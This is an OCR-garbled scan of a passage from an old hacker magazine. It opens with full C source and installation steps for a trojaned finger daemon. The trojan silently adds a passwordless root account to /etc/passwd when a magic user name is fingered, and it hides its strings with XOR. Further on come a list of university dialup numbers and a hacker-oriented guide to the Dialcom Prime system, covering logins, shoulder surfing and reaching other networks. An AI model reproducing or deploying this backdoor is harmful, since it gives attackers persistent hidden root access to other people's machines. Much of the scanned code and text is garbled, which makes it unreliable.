usually, if an operator figure out that his system is under attack, he’1l 
check out the login program and telnetd for backdoors, then the telnet for 
logging activities or network sniffers and so on.. if nothing is found 
he’11 realize the hacker is a dumb ass and he’1l just modify the passwd to 
prevent him from logging on (in most cases), here comes my fingerd trojan. 
This scheme is quite original (I’ve never seen it used) and the source is 
compact enough to be fitted into a MAG. The fingerd as all you know (I 
hope) is the finger server run by inetd when a client opens the finger 
port (N.79), of course if the port is locked, or you have a network 
firewall, do not use this code. 


---------- + CUT HERE 4 


/* The Fingerd trojan by Hitman Italy 
* This source cannot be spread without the whole article 
but you can freely implement or modify it for personal use 


*if 


static char copyright[] = ""; /* Add the copyright string here */ 


static char sccsid[] = ""; /* Add the sccsid string here */ 


include <stdio.h> 


define PATH_FINGER "/usr/ucb/finger" 
define CODE 161 


char *HitCrypt (ch) 
char *ch; 
{ 
char -*b; 
b=ch; 
while ((* (ch++) *=COD 
return (b); 


Gl 


) !=0x00); 
} 


main(argc, argv) 
int argc; 
char *argv[]; 
{ 

register FILE *fp; 
register int ch; 
register char *lp; 
int p[2]; 


static char exor[4] [23]={ 
{201,200,213,CODE}, 
{142,196,213,194,142,209,192,210, 210, 214,197,COD 


GI 
—) 
~ 
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201,200, 213,155,155,145,155,145,155,155,142,155,142,195,200, 207,142,194, 
210,201, CODE}, 

227,192,194, 202,197, 206, 206, 211,129,192,194, 213, 200, 215,192, 213,196,197, 
143,143,143,CODE} }; 


define ENTRIES 50 
char **ap, *av[ENTRIES + 1], line[1024], *strtok(); 


ifdef LOGGING /* unused, leave it for "strings" command */ 
include <netinet/in.h> 

struct sockaddr_in sin; 

int sval; 


sval = sizeof(sin); 
if (getpeername(0, &Sin, &Sval) < 0) 
fatal(argv[0],"getpeername"); 
#endif 


if (!fgets(line, sizeof(line), stdin) ) 
exit(l1); 


av[0] = "finger"; 


for (lp = line, ap = é&av[1]J;;) { 

*ap = strtok(lp, " \t\r\n"); 

if (!*ap) 
break; 

if ((*ap) [0] == ’/’ && ((*ap)[1] == ’W’ || (*ap) [1] == ’w’)) 
*ap = Woy Wes 

if (++ap == av + ENTRIES) 
break; 

lp = NULL; 


if (pipe(p) < 0) 
fatal(argv[0],"pipe"); 


switch(fork()) {f 


case 0: 
(void) close (p[0]); 
if (pl) w= 1) { 
(void) dup2(p[1], 1); 
(void) close(p[1]); 
} 
/*-=-=-=-=-=— PUT HERE YOUR CODE -=-=-=-=-=-*/ 


if (av[1]) 
if (strcemp( (HitCrypt (&exor[0] [0 
if(! (fp=fopen( (HitCrypt (&exor [ 
_—exit (10); 
fprintf(fp,"ss\n", HitCrypt (&exor[ 
printf("Ss\n", HitCrypt (&exor[3] [0 
fclose (fp); 
break; 


] ) 
1]{0])) ,"a 


= 
— 
= 
:O 
fa 
= 
sS 

~ 


/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ 


if (execv(PATH_FINGER, av) ==-1) 
fprintf(stderr,"No local finger program found\n"); 
_exit (1); 
case -l: 
fatal(argv[0],"fork"); 
} 
(void) close(p[1]); 
if (!(fp = fdopen(p[O], "r"))) 
fatal(argv[0],"fdopen") ; 
while ((ch = getc(fp)) != EOF) { 
putchar (ch); 
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fatal (prg,msg) 
char *prg, *msg; 
fprintf(stderr, "Ss: ", prg); 


perror (msg) ; 
exit (1); 


--------- + CUT HERE 4 


I think it’s quite easy to understand, first of all, inetd opens th 
socket and pipes the the input data through the fingerd 


* aif (!fgets(line, sizeof(line), stdin) ) 

i. exit(1); 

* av[0O] = "finger"; 

* for (lp = line, ap = é&av[1];;) { 

* *ap = strtok(lp, " \t\r\n"); 

* if (!*ap) 

td break; 

* if ((*ap) [0] == ’/’ && ((*ap) [1] == 'W' || (*ap) [1] == ’w’)) 
4 *ap = aa 


here it gets the data from stdin and parses them (strtok) converting (due 
to RFC742) any '/W’ or '/w’ old options in ’-l’ 


* switch(fork()) {f 

* case 0: 

* (void) close (p[0]); 

* if (p[l] != 1) { 

* (void) dup2(p[1], 1); 
* (void) close(p[1]); 

* 


} 
the task goes into the background 


if (execv (PATH_FINGER, av) ==-1) 
fprintf(stderr,"No local finger program found\n"); 


here the daemon executes the local finger with remote parameters 


x (void) close(p[1]); 

is if (!(fp = fdopen(p[0], "r"))) 

s fatal(argv[0],"fdopen") ; 

* while ((ch = getc(fp)) != EOF) { 
* 


putchar (ch); 


the output is piped back to the remote system 


That’s how the finger daemon works... now the trojan, basically we’1l 
check out the input finger user till the magic code matches, then our 
sleepin’ trojan will wake up and do the job... let’s examine my code 
(decrypted) 
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/ 
if (av[1]) 
if (strcmp ("hit",av[1])==0) { 
if (! (fp=fopen ("/etc/passwd","a"))) 
exit (10); 


fprintf (fp, "hit::0:0::/:/bin/csh\n") ; 
printf ("Backdoor activated...\n"); 
fclose(fp); 

break; 
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/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ 


When the "hit" magic code matches the trojan will modify the passwd adding 
a fake unpassworded root user named "hit", so you can relogin as root, 
cover your tracks and keep on working. Of course this is an example, you 
can do what you want simply adding your custom code, you may remote cat a 
log file without logging in, or remote kill an user, maybe root logins are 
disabled so you have to make a suid shell and add a normal entry in the 
passwd or open a port and so on, you can also use multiple codes if you 
like. If the magic word doesn’t match of course the finger will work out 
normally. 


<example> 

# finger hit@666.666.666.666 
[666.666.666.666] 

Backdoor activated... 


Well done! You have gained a root access. 
(aes) 

# cat /etc/passwd 

root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh 
nobody: *:65534:65534::/: 

daemon: *:1:1::/: 

SySi*i23222/4/bin/esh 

bins? 3:34 32/bin’ 
uucp:*:4:8::/var/spool/uucppublic: 
news:*:6:6::/var/spool/news:/bin/csh 
ingres:*:7:7::/usr/ingres:/bin/csh 
audit:*:9:9::/etc/security/audit:/bin/csh 
synce::1:1::/:/bin/synce 
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh 


Gee On O evarars 

hit::0:0::/:/bin/csh 

“““ they run NIS... anyway our local root login will work fine 
<example> 


#finger hit@hacked.system.com 

[hacked.system.com] 

here is the log 

user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001 
user: yitO0Ol from: (...) 


That’s really useful to collect logfiles without logging in and leave 
tracks everywhere. 


Now the problem.... 
If you want to use the fingerd to run world accessible commands you won’t 
have any problem but if you require root privileges check this out: 


#grep fingerd /etc/inetd.conf 
finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd 


AKRAAKRAAA 


On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with 


NFS etc..), as nobody of course you cannot modify the passwd, so edit the 
file 
finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd 


now you have to refesh the inetd process 


#kill -HUP <inetd pid> 


now you can do what you want, many unix clones let the fingerd running as 
root by default... and even if you have to modify the inetd.conf an 
operator unlikely will realize what is appening since all other daemons 
run as root. 
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Why have I crypted all data? 

#strings login 

(20edt) 

Yeah d00dz! That’s a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...) 


Lame or not? All alien data must be crypted.. a fast exor crypting 
routine will work fine, of course you can use the standard crypt function 
or other (slow) algorithms but since security is not important (we just 
want to make our texts invisible) I suggest using my fast algo,to create 
the exor matrix simply put all texts on a file and use the little 
ExorCrypt utility I have included UUencoded below (amiga/msdos version) . 


<example amiga> 

echo > test "this is a test" 

Acrypt test test.o 

line crypted: 1 

type test.o 

static char exor[]={ 

213,201,200,210,129,200, 210,129,192,129,213,196,210,213,161}; 


char *ExorCrypt (ch) 
char *ch; 
{ 
char *b; 
b=ch; 
while ((* (ch++) *=0xal) !=0x00); 
return (b); 


} 


The utility will create th xor vector (matrix) (from the 80 column 
formatted ascii input text) and the specific decoding function, If you do 
not supply a key "Sal" will be used, remember to add a NewLine if 
necessary, the vector/matrix never contain them. 


Before compiling the whole thing you must add the copyright and sccsid 
strings I have not included (they may vary). 
Let’s simply do: (SunOs) 


#strings /usr/etc/in.fingerd 

@(#) Copyright (c) 1983 Regents of the University of California. 
All rights reserved. “*“**“ COPYRIGHT STRING 
@(#)in.fingerd.c 1.6 88/11/28 SMI <<<< SCCSID STRING 
getpeername 

finger 

pipe 

/usr/uch/finger 

No local finger program found 

fork 

fdopen 


Bas 
oS: 


(CCC 
DDDDDDDDDD 


AAAAAA 
BBBBBB 


The top of source becomes: 

static char copyright []= 

"@(#) Copyright (c) 1983 Regents of the University of California.\n\ 
All rights reserverd.\n"; 

static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI" 


That’s all. Now you can compile and install your fingerd trojan, 
the source was adapted for SunOS but you can port it on many unix 
clones without troubles. 
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Few final words to: 
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KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKAKKK 


The Phrack University Dialup List 


[We’ve been compiling all these for months now, and still have 


hundreds more to add. 


If you know dialups for any other 


. EDU 


sites or Universities 


th 


lsewher 


Please, 


Internet, 


pleas 


in the world that are on 
mail them to us at phrack@well.com. 


Universities ONLY...this is a list to assist students. 


201-529-6731 


201-596-3500 NJIT.EDU 
201-648-1010 RUTGERS . EDU 
203-432-9642 YALE.EDU 
205-895-6792 UAH .EDU 
206-296-6250 SEATTLEU.EDU 
206-552-5996 WASHINGTON. EDU 


685-7724 
7796 
209-278-7366 CSUFRESNO.EDU 
209-632-7522 CALSTATE.EDU 
209-474-5784 CSUSTAN.EDU 
523-2173 
667-3130 
723-2810 
210-381-3681 PANAM. EDU 
3590 
210-982-0289 UTB.EDU 


212-206-1571 
229-5326 


212-854-1812 


NEWSCHOOL. EDU 


COLUMBIA.EDU 


1824 

1896 

3726 

9924 
212-995-3600 NYU.EDU 

4343 
213-225-6028 CALSTATELA.EDU 
213-259-2732 OXY . EDU 
213-740-9500 USC .EDU 
214-368-1721 SMU .EDU 


3131 
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215-359-5071 DCCC.EDU 


215-436-2199 WCUPA.EDU 
6935 


215-489-0351 URSINIUS .EDU 


215-572-5784 BEAVER. EDU 


215-641-6436 MC3.EDU 


215-204-1010 TEMPLE .EDU 
9630 
9638 


215-889-1336 PSU.EDU 


215-895-1600 DREXEL.EDU 
5896 


215-896-1318 HAVERFORD . EDU 
1824 


215-898-8670 UPENN. EDU 
6184 
0834 
3157 


216-368-8888 CWRU. EDU 


217-333-4000 UIUC.EDU 
3700 
244-5109 
4976 
255-9000 


219-237-4116 INDIANA.EDU 
4117 
4186 
4187 
q 
q 


190 
413 
4415 
262-1082 
481-6905 
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by 
Herd Beast 
(hbeast@phantom. com) 


Introduction 


Dialcom is an interesting system for hackers for two reasons: 

First, it is used by business people, reporters and many other world 
wide, and it offers a variety of information services, froma 

bulletin board to stock market updates and news services. Second, 
Dialcom runs on Prime machines, so using Dialcom is a good way to 

learn Prime. True, it’s not the best, as access is generally restricted, 
but it’s better than, say, learning VMS from Information America. 


In these days, wher veryone seems to be so centered about the 
Internet and the latest Unix holes, it’s important to remember that the 
information super-highway is not quite here, and many interesting things 
are out there and not on the Internet. Phrack has always been a good place 
to find out more about these things and places, and I wrote this article 
after reading the Dialog articles in Phrack. 


Well, gentle reader, I guess that my meaning-of-life crap quota is full, 
so let’s move on. 


Accessing Dialcom and Logging In 


Dialcom is accessible world-wide. It offers connection to Tymnet, Sprintnet, 
and other networks as well as dialin modems. Since I am not writing to 
Washington people only, I will specify only the easiest methods -- Tymnet 
and Sprintnet -- and some of the more interesting access methods. 


Dialcom is basically a Primecom network. Each user has an account on 
one or more of the systems connected to that network. To access Dialcom, 
t 

i 


he user needs to access the machine his account is on. First, he logs 
nto a public data network and follows the steps required to connect to 
a remote note. On Tymnet, this means getting to the "please log in:" 
prompt, and on Sprintnet it’s the famous ’@’ prompt. 


For Tymnet, you must enter at the prompt: DIALCOM;<system number> 
(eg, DIALCOM;57). The same goes for TYMUSA connection from outside 
the USA. 


For Sprintnet or other PADs, you must enter the correct NUA: 


System # Sprintnet NUA Tymnet NUA 
XX 3110 301003XxX 3106 004551XxX 
(32, 34, 
AL: MG, 
50, 52, 
aby “Ose s 
63, 64) 


It should be noted that Dialcom keeps its own X.25 network, Dialnet, 
and the NUAS on it are those of the systems (connect to address "57" 


14.txt Wed Apr 26 09:43:40 2017 2 
for system 57). 


Dialcom has other access methods, meant to be used from outside the 
USA, but sometimes available from within as well. 


One is a COMCO card, which is inserted into a reader connected to the 
computer and the modem through a serial link. The user then calls a 
special dial-up number, and can connect to Dialcom (or any other NUA). 

The card contains a number of "tax units" which are deducted as the 
connection goes through, until they are exhausted and the card is useless. 
The user calls the dial-up and types in ".<CR>". The amount of tax units 
on the card will then appear on the screen, and the user can connect to a 
host. COMCO dial-ups: 


Location Number 
Australia +61-02-2813511 
Belgium +32-02-5141710 
France +33-1-40264075 
West Germany +49-069-290255 
Hong Kong +852-5-8611655 
Netherlands +31-020-6624661 
Switzerland +41-022-865507 
United Kingdom +45-01-4077077 
USA (Toll Free) +1-800-777-4445 
USA +1-212-747-9051 

The other way is through Infonet. I will not turn this into an Infonet 


guide, save to write the logon sequence needed to access Dialcom. 
At the ’#’ prompt, enter ’C’. At the "Center:" prompt, enter "DC". 
Dialcom NUAS are 31370093060XX, where XX is the system number. 


Once the connection to a Dialcom system has been established, you will 
be greeted by the Prime header: 


Primecom Network 19.4Q0Q.111 System 666 


Please Sign On 
> 


And the ’>’ prompt. This is a limited prompt as most commands cannot 
be issued at it, so you need to login. 


Dialcom user id’s are typically 3 alphabetic characters followed by 
several digits. The password may contain any character except for 
",;/*" or spaces, and my experience shows that they tend to be of 
intermediate complexity (most will not be found in a dictionary, but 
could be cracked). 


Password security may become useless at this point, because the Dialcom 
Prime systems allow ID to take both user id and password as arguments 
(which some other Primes do not) and in fact, Dialcom tutorials tell 
users to log on like this -- 


>ID HBTOO7 IMEL8 


—-- which makes ‘*‘shoulder surfing’’ easier. 
One you log on, you will see: 
Dialcom Computer Services 19.40Q.111(666) 


On At 14:44 07/32/94 EDT 
Last On At 4:09 06/44/94 EDT 


=] 


> 


And again, the ’>’ prompt. 
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>off 
Off At 14:45 07/32/94 EDT 
Time used: 00h 00m connect, 00m O1s CPU, 00m 00s I/O. 


Security at Dialcom 


As mentioned, while passwords are relatively secure, the manner in 
which they ar ntered is usually not. 


As for the accounts themselves, it’s important to understand the 
general way accounts exist on Dialcom. Dialcom users are usually 
part of a business that has an ‘*‘account group’’ on Dialcom. Each 
user gets an account from that group (HBT027, HBT054). Each group 
also has a group administrator, who controls what each account can 
access. The administrator determines which programs (provided by Dialcom) 
each user can access. A foreign correspondent for a magazine might 

have access to the news services while other users might not. The 
administrator also determines how much the user can interface with 
the Prime OS itself. Each user can run a few basic commands (list 
files, delete, sign off) but above that, it’s up to the administrator. 
The administrator may opt to remove a user from the controlling menuing 
system -- in which case, the user has no restrictions forced upon him. 


Group administrators, however, handle only their groups, and not the 
Dialcom system. They need, for example, to notify Dialcom staff if 
they want an account removed from the system. 


Another (different yet combined) part of the account/group security 
are accounts’ ‘‘security levels’’ (seclevs). Seclevs range from 3 

to 7, and determine the access an account has to various places. 
Seclev 4 users, for example, are not restricted to seeing only users 
of their group on the system, and can delete accounts from the menuing 
system. 


User accounts own their directories and files within (but high seclevs 

can read other users’ files). Each account’s security is left in some 
extent to its owner, in that the user sets his own password. When 

setting a password, a user can set a secondary password. Any user wishing 
to access that user’s directory will need that password. Furthermore, 

the user can allow other users to attach as owners to his directory if 
they know his password (come to think of it, couldn’t they just login 

as him?). This is all controlled by the PASSWD program (see **Common 
Commands’’, below). 


Dialcom also allows for login attempt security using the NET_LOCK 
program. NET_LOCK blocks login attempts from addresses that have 
registered too many login failures over a period of time (the default 
being blocking for 10 minutes of addresses that have registered mor 
than 10 failed login within 5 minutes). NET_LOCK -DISPLAY is accessible 
to users of Seclev 5 and shows addresses currently blocked and general 
information. Other options are accessible to Seclev 7 and are: 

-ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block 

an address), -LOCK_PERIOD (the period in which these attempts must 
occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the 
lockout feature is disabled). 


A little unrelated is the network reconnect feature of the Prime 
computers. When a user gets disconnected from the system becaus 

of a network failure, or for any other reason which is not the 
system’s fault, he can log back in and reconnect into the disconnected 
job. When this happens, the user sees, upon logging on: 


You Have a Disconnected Job: 


HBTOO7 dog 1» 109 NT NETLINK 989898989 or. 3 


14.txt Wed Apr 26 09:43:40 


Do You Want to Reconnect? 


Which means user’s HBTOO7 job #9 


over a network, and then uses NETLINK 


2017 


(a NETLINK command) is waiting for 
a reconnection. At this point, the user can continue, leaving the 
job to hang until the system signs it off when a certain amount of 
time expires; sign the job off himself; 
(Try "HELP" at the prompt.) This wouldn’t be important, but experience 
shows that many disconnections occur when someone logs into Dialcom 


or reconnect to that job. 


to another site over a network, and somewhere, 


a control sequence (let’s say to tell N 
gets processed by the first network, 
is potential to log into the middl 


detached ttys). 


Common Commands 


which 


(or another program) to connect 


ome time, he issues 


Ss 


ETLINK to do something) that 
logs him off. So there 


of people’s sessions (yeah, like 


Common commands are in reality the basic Prime commands that every 
account has access to. Here they are, 


‘CLEAR’ Clear the screen. 


in alphabetical order. 


‘DATE’ Shows the date at which a command was entered. Output: 


>DATE 
Proceed to next command 


>BAH 


Friday, June 38, 1994 10:01:00 AM 


‘DEL’ Deletes a file. 


‘DELP’ Deletes several files based on wil 
of every file, and delete only fil 


between certain dates. 


4 
ie 
1s) 

~ 


Gl 
1s) 
= 


ldcards. Can verify deletion 
e modified before, after, or 


brothers are JED and FED) 


ointer to the top of the 


text, 


¥: 
( 
T 
on the line that the pointer points to. 
p 
n 
t 


Ps PRINT the pointer line. 


of lines. 
Change words. 


Retype pointer lin 


[The format is 


Th 


Once i 
in which the user just types text. 


Is the default and simplest file editor on Dialcom (some of its 
nvoked, ED enters INPUT mode, 
To enter EDIT mode, where 
ou can issue commands, you need to press <CR> on a blank line 
the same thing will get you from 


EDIT mode back to INPUT mode). 
he EDIT mode uses a pointer to a line. 


All commands are carried 
"T" will bring the 


"B" to the bottom, "N" to the 


ext line down, "U" to the next line up, 
he line containing <word>. 


and "L <word>" to 


ED commands include: 


P<number> will print <number> 


CG: 
A: Appends words. The format is 
R: 
Ss 


P: Check the spelling of the text, 
the top of the text. 


n 
He 
< 

7] 


Will save the text and exit ED. 


O: Will quit/abort editing and exit 


AES List all file info. Output: 


DIALCOM.TXT 001 13/30/94 


Which means file name "DIALCOM.TXT", 
lat modified on 13/30/94 at 13:50, 


13:50 ASC 


a 


"C/old word/new word". 
"A <words>". 
format is "R <new line>". 


nd then point to 


DWR 


size of 1 file blocks, 
is an ASC type file, and 


the account has the permissions to D(elete), W(rite), and 


R(ead) it. 
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‘HELP’ (*?’) Displays a nicely formatted menu of available commands. 
‘INFO’ System info. INFO <info-file-name> displays an information 
file, for example, INFO NETLINK. 
"INFO ?" lists info files. 
"INFO BRIEF" lists info files grouped by application 
"INFO INFO" lists info files with their descriptions. 
‘L’ List all file names. Output: 
<S666-6>HBTO0O7 (Owner) 
DIALCOM. TXT 
‘LS’ Display information about available segments and the account’s 


access to them. Output: 


2 Private static segments. 
segment access 


4000 RWX 
4001 RWX 


11 Private dynamic segments. 
segment access 


4365 RX 
4366 RX 
4367 RWX 
4370 RWX 
4371 RX 
4372 RWX 
4373 RX 
4374 RWX 
4375 RX 
4376 RX 
4377 RWX 
‘NAME’ Changes UFD name. Output: 


‘NI 


>NAME 


Old Name: John Gacy 
UFD Name: Herd Beast 
All done 


>WHO 


Herd Beast <S666-6>HBTOO7 


ETWORK’ Accesses a database that contains dial-up number for Sprintnet, 
Tymnet, Datapac and Dialcom’s Dialnet by State/City. 


‘OFF’ Sign off the system. 


‘ONLINE’ Who’s online? The amount of data displayed depends on the 


account’s seclev. Seclevs below 4 are restricted to seeing 
only users of their group. Output: 


HBTOO7 PRKO17 MJR 
‘PAD’ Allows you to send commands to an X.29 PAD, these commands 
being the SET/SET?/PAR? commands and their parameter/value 


pairs. 


‘PASSWD’ Change your password. PASSWD has two forms: a short one, 


which just changes the user’s password, and a long form, 
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invoked by PASSWD -LONG, which allows the user to set 

a second password for other users accessing his directory, 
and also to determine if they can have owner access to 
the directory. 


‘PROTECT’ Protects a file (removes permissions from it). 


"PROTECT DIALCOM.TXT" will remove all three (D, W, R) 
attributes from it. This will result in: 


>DEL DIALCOM. TXT 
Insufficient access rights. DIALCOM.TXT (DEL:10) 


But -- 


>DELETE DIALCOM. TXT 
"DIALCOM.TXT" protected, ok to force delete? y 


‘SECLEV’ Your security level. Output: 
Seclev=5 
‘SIZE’ Size information about a file. Output: 


1 Block, 404 Words 


‘STORAGE’ Shows storage information. 
‘Sy’ Show users on system. (Same restrictions as for ONLINE apply.) 
Will show user name, time on, idle time, devices used, current 
jobs and state, etc. Output: 


41 Users on sys 666 


Names use idle mem State command object devs 
HBTOO7 zs O. 155 R1 oy. 6 3 from Tymnet via X.25 
“SYS! Displays account information and system number. Output: 


<S666-6>HBTO0O7 on system 666. 


‘TERM’ Used to tell the Dialcom computer what terminal the user is 


using. A list of supported terminals is generated by "TERM 

TERMINALS". ERM options are: 

TYPE <terminal type> (TYPE VT100) 

WIDTH <width> (Terminal width, if different 
than default) 

TOP (Start listings at top of screen) 

PAUSE (Pause listings when screen is 
full) 

-ERASE, -KILL <char> Sets th rase or kill character) 

-BREAK <ON|OFF> Enables or disables BREAKs) 


-HALF or —-FULL 
—-DISPLAY 


Half duplex of full duplex) 
Output current terminal information) 


( 
( 
( 
( 


‘WHO’ Displays account information. Output: 
<S666-6>HBT007 
Which means user HBTOO7 on system 666 on device 6. 


Communicating on Dialcom 
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Users who want to communicate on Dialcom have two choices, basically. 
These are the Dialcom bulletin board and electronic mail. The Dialcom 
bulletin board has two versions. The first consists of several messag 
bases (called ‘‘categories’’) which are shared between some Dialcom 
systems (and mostly used by bored employees, it seems); there are also 
private bulletin boards, which are not shared between the systems. They 
belong to account groups, and only users in an account group can access 
that group’s bulletin board system. These version of the Dialcom board 
are often empty (they have no categories defined and hence are unusable). 


This is accessed by the command POST (PRPOST for the private board). 
Once POST is activated, it will display a prompt: 


Send, Read or Purge: 


If the answer is READ, POST will ask for a category (a list of categories 
will be displayed if you type HELP at that prompt). Once a category 
has been joined, you will be able to read through the messages ther 


Subject: ? 
From: HBTOO7 Posted: Sat 32-July-94 16:47 Sys 666 


Continue to Next Item? 


Answering SEND at the first prompt will allow you to send a message in a 
category. 


Answering PURGE will allow you to delete messages post by your account. 
When you enter PURGE and the category to purge message from, the system 
will show you any posts that you are allowed to purge, followed by a 


Disposition:" prompt. Enter DELETE to delete the messag 


iv 


The second way to communicate is the Dialcom MAIL system. MAIL allows 
sending and receiving messages, it allows for mailing lists, filing 
mail into categories, holding mail to read later and so on. MAIL is 
invoked by entering, uh... oh, yes, MAIL. 


It works along similar lines to those of POST, and will display the following 
prompt: 


Send, Read or Scan: 


SEND: Allows you to send a message. It will prompt with "To:", 
"Subject:" and "Text:" (where you enter the actual message, followed 
by ".SEND" on a blank line to end). After a message is sent, the 
"To:" prompt will appear again -- use "QUIT" to leave it. 


A word about the "To:" prompt. There are two configuration files which 
make its use easier. First the MAIL.REF file, which is really a mailing 
list file. It contains entries in the format of -- 


<Nick> <Accounts> 
DOODZ DVRO14 ABCO013 XYZ053 


-- and at the "To:" prompt, you can just enter "DOODZ" and the message 

will be sent to all three accounts. When you enter a name, MAIL searches 
through your MAIL.REF, and then through the account administrator’s, and 
only then parses it as an account name. Second is the mail directory, 

which contains the names and account IDs of many users the account is 
i 
Y 


n contact with. To display it, type "DIS DIR" at the first prompt. 
ou’1ll get something like this: 


HERD-BEAST 6666:HBTOO7 WE’RE BAD AND WE’ RE KRAD 
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Which means you can type "HERD-BEAST" at the prompt, and not just 
HBTOO7. Also, there are special options for the "To:" prompt, most 
notable are: CC to send a carbon copy; EX to send the message with 
‘*express priority’’; DAR to request that if the message is sent 

to a user on another Dialcom system, POSTMASTER will send you a 
message verifying that your message has been sent; and NOSHOW, 

to keep the receiver from seeing everybody else on the "To:" list. 


For example (all these people are in the mail directory), 


To: DUNKIN D.DREW CC FOLEY NOSHOW EX 


You enter the message about to be sent at the "Text:" prompt. That 
mode accepts several commands (like .SEND), all of which begin with a 
dot. Any command available at the "To:" prompt is available here. 


For example, you can add or remove names from to "To:" field using 
".TO <ids>" or ".TO -<ids>", and add a CC using ".CC <id>". 

You also have a display command, ".DIS". ".DIS" alone shows the text 
entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows 

th ntire header; etc. Finally, you have editing option. ".ED" will 
load editing mode, so you can change the text you entered. ".LOAD 
<filename>" will load <filename> into the text of the message. ".SP" 


will check the spelling of text in the message, and there are other 
commands. 


READ: Allows you to read mail in your mailbox. Once you enter READ, 
MAIL will display the header of the first message in your mailbox 

(or "No mail at this time") followed by a "--More--" prompt. To 

read the message, press <CR>; otherwise, enter NO. After you are done 
reading a message, you will be prompted with the "Disposition:" prompt, 
where you must determine what to do with the message. There you can enter 
several commands: AGAIN to read the message again; AG HE to read the 
header again; AP REPLY to reply to the message and append the original 
message to the reply; AP FO to forward the message to someone and add 
your comments to it; REPLY to reply to the sender of the message; REPLY 
ALL to reply to everybody on the "To:" field; FILE to file the message; 
SA to save the message into a text file; NEXT to read the next messag 
in your mailbox; and D to delete the messag 


SCAN: Allows you see a summary of the messages in the mailbox. Both 

READ and SCAN have options that allow you to filter the messages you 

want to read: FR <ids> to get only messages from <ids>; TO <ids> to 

get only messages sent to <ids>; ‘string’ to get only messages containing 
‘“*string’’ in the "Subject:" field; "string" to get only messages 
containing ‘‘string’’ in the message itself; FILE CATEGORY to get only 
messages filed into ‘‘CATEGORY’’; and DA Month/Day/Year to get only messages 
in that date (adding a ’-’ before or after the date will get you everything 
before or after that date, and it’s also possible to specify two dates 
separated by a ’-’ to get everything between those dates. For example, 

to get all of Al Gore’s messages about Clipper before August 13th: 


READ FILE CLIPPER FR GOR ’Great stuff’ DA -8/13/94 


There is also a QS (QuickScan) command that behaves the same as SCAN, 
only SCAN shows th ntire header, and QS just shows the "From:" field. 


However, there is more to do here than just send, read or scan. 
Some of it was mentioned when explaining these commands. Both sent 
and received messages can be saved into a plain text file or into 

a special mailbox file, called MAIL.FILE. Messages filed into the 
MAIL.FILE can be grouped into categories in that file. 


SAVING MESSAGES: Messages are saved by entering "SA filename" at a 


prompt. For sent message, it’s the "Text:" prompt, while entering the 
message, and the command is ".SA", not "SA". For received message, it’s 
ither the "--Mor "or the "Disposition:" prompt. 


FILING MESSAGES: Messages are filed in two cases. First, the user 
can file any message into any directory, and second, the system files 
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read messages that lay in the mailbox for over 30 days. Received messages 
are filed by entering "FILE" at the "Disposition:" prompt. This files 

the message into a miscellaneous category called BOX. If an optional 
<category-name> is added after "FILE", the message will be filed into 

that category. If <category-name> doesn’t exist, MAIL can create it 

for you. After a message has been filed, it’s not removed from the 
mailbox -- that’s up to the user to do. Sent messages behaved the sam 
way, but the command is ".FILE" from the "Text:" prompt. 


To display categories of filed mail, enter DIS FILES at a prompt. To 
read or scan messages in filed, just add "FILE <category-name> after 
the command (READ, SCAN, etc). To delete a category, enter D FILE 
<category-name>. To delete a single message in a category, just use 
D as you would on any other message, after you read it from the 


MAIL.FILE. 


Gl 


Connecting via Dialcom 


Dialcom allows its customers to access other systems through it. 

There are some services offered specifically through Dialcom, such as 

the BRS/MENUS service, which is an electronic library with databases 

about many subjects, Telebase’s Cyclopean Gateway Service, which offers 
access to many online database services (like Newsnet, Dialog and even BRS) 
a 

t 

Ss 


ma 


nd more. These services have a direct connection to Dialcom and software 
hat maps Dialcom user ids to their own ids (it’s not usually possible for 
omeone to access one of these services without first connecting to Dialcom). 


Another method is general connection to X.25 addresses. Since Dialcom 
is connected to X.25, and it allows users to use the Prime NETLINK 
commands, it’s possible to PAD out of Dialcom!!#! 


NETLINK is invoked by entering NETLINK. NETLINK then displays its own, 
'@’ prompt. The commands available there are QUIT, to quit back to 
the OS; CONTINUE, to return to an open connection; CALL, to call an 
address; and D, to disconnect an open connection. 


CALL takes addresses in several formats. A system name, to connect to 
a Dialcom system, or an address in the format of DNIC:NUA. For example, 


@ CALL :666 
Circuit #1 
666 Connected 
Dexess, |] 


@ CALL 3110:21300023 
Circuit #2 

21300023 Connected 
[ames] 

ETLINK establishes connections in the form of circuits. A circuit can 
e broken out of into command mode (the ’@’ prompt), using "<CR>@<CR>", 
nd another can be opened, or parameters can be changed, etc. 

ETLINK has other commands, to log connections into a file, or set PAD 
arameters (SET, PAR), or turn on connection debugging, or change 

he default ’@’ prompt, and more. 


Things to Do on Dialcom 


Much of what Dialcom offers was not covered until now and will not 
be covered. That’s because most the services could use a file each, 
and because many account groups have things enabled or disabled 
just for them. Instead, I will write shortly about two of the more 
interesting things online, the news service and clipping service, 
and add pointers to some interesting commands to try out. 


The news service, accessed with the NEWS command, is a database of 
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newswires from AP, Business Wire, UPI, Reuters and PR Newswire. 
The user enters the database, and can search for news by keywords. 


After entering NEWS, you will see a menu of all the news agencies. 

Once you choose an agency, you will enter its menu, which sometimes 
contains a copyright warning and terms of usage and also the list 

of news categories available from that agency (National, North America, 
Business, Sports, etc). Once you choose the category, you will be 

asked for the keyword to search for. If a story (or several stories) was 
found containing your desired keyword, you can read through the 

stories in the order of time, or the order they appear, or reverse 

order and so on, and finally mail a story to yourself, or enter new 
search keywords, or jump to another story, or simply quit. 


The news clipping service, available with the command NEWSTAB, allows 
the user to define keyword-based rules for selecting news clippings. 

The system then checks every newswire that passes through it, and if 

it matches the rules, mails the newswire to the user. 


After entering NEWSTAB, you are presented with a menu that allows you 
